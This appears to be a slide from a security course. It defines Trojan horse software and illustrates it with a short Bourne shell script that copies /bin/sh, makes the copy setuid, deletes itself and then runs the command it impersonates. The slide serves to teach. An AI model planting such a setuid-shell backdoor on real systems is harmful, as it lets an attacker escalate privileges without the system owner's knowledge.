First page Back Continue Last page Summary Graphic
Methods of Attack
Trojan Horses
Software is described as a Trojan Horse when it performs some superficial function as expected, but executes additional commands which serve to corrupt the security measures in the system.
Example: Bourne shell
#!/bin/sh
mkdir ./lib
/bin/cp /bin/sh ./lib/sh
/bin/chmod 4775 ./lib/sh
/bin/rm .$0
/bin/$0 $*